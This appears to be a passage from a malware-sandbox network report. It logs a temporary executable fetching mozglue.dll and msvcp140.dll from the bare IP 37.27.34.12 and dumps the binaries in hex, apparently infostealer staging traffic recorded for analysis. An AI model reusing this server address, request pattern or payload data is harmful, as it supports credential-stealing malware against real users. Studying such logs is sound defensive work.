                                                            Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                            2024-05-27 13:24:31 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                            Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                            2024-05-27 13:24:31 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                            Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                            2024-05-27 13:24:31 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                            Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                            2024-05-27 13:24:31 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                            Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                            2024-05-27 13:24:31 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                            Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                            2024-05-27 13:24:31 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                            Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                            2024-05-27 13:24:31 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                            Data Ascii: 0<48%8A)$(


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.85310337.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:32 UTC171OUTGET /mozglue.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:33 UTC246INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:32 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 608080
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-94750"
                                                            Accept-Ranges: bytes
                                                            2024-05-27 13:24:33 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                            Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                            2024-05-27 13:24:33 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                            Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                            2024-05-27 13:24:33 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                            Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                            2024-05-27 13:24:33 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                            Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                            2024-05-27 13:24:33 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                            Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
                                                            2024-05-27 13:24:33 UTC16384INData Raw: 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8
                                                            Data Ascii: H) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) sUSWV
                                                            2024-05-27 13:24:33 UTC16384INData Raw: 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 83 f9 08 8b 7c 24 08 0f 83 b0 03 00 00 85 db 0f
                                                            Data Ascii: D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F|$4rD$ D$ WVjjPS,VL$4|$
                                                            2024-05-27 13:24:33 UTC16384INData Raw: 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c 24 89 7c 24 08 8b 4b 08 89 0c 24 89 53 04 0f a4
                                                            Data Ascii: D$4P<|$\$t@)GD$ P08z.Jt_@u`|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<$|$K$S
                                                            2024-05-27 13:24:33 UTC16384INData Raw: 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b 10 83 e2 fe 83 e1 01 09 d1 89 4e 04 89 30 8b 4b
                                                            Data Ascii: XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKNN0K
                                                            2024-05-27 13:24:33 UTC16384INData Raw: c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 85 c0 0f 84 c2 09 00 00 80 60 04 fe 8b 4c 24 0c
                                                            Data Ascii: rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H`L$


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.85310437.27.34.124437360C:\Users\user\AppData\Local\Temp\katDDA4.tmp
                                                            TimestampBytes transferredDirectionData
                                                            2024-05-27 13:24:34 UTC172OUTGET /msvcp140.dll HTTP/1.1
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                            Host: 37.27.34.12
                                                            Cache-Control: no-cache
                                                            2024-05-27 13:24:34 UTC246INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 27 May 2024 13:24:34 GMT
                                                            Content-Type: application/octet-stream
                                                            Content-Length: 450024
                                                            Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                            Connection: close
                                                            ETag: "6315a9f4-6dde8"
                                                            Accept-Ranges: bytes
                                                            2024-05-27 13:24:34 UTC16138INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
                                                            2024-05-27 13:24:35 UTC16384INData Raw: 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d 00 72 00 2d 00 69 00 6e 00 00 00 6d 00 73 00 2d
                                                            Data Ascii: hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnmr-inms-
                                                            2024-05-27 13:24:35 UTC16384INData Raw: 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c8 8b 00 10 00
                                                            Data Ascii: {|L@DX}0}}M@4}0}}4M@tXM}0}}XM@
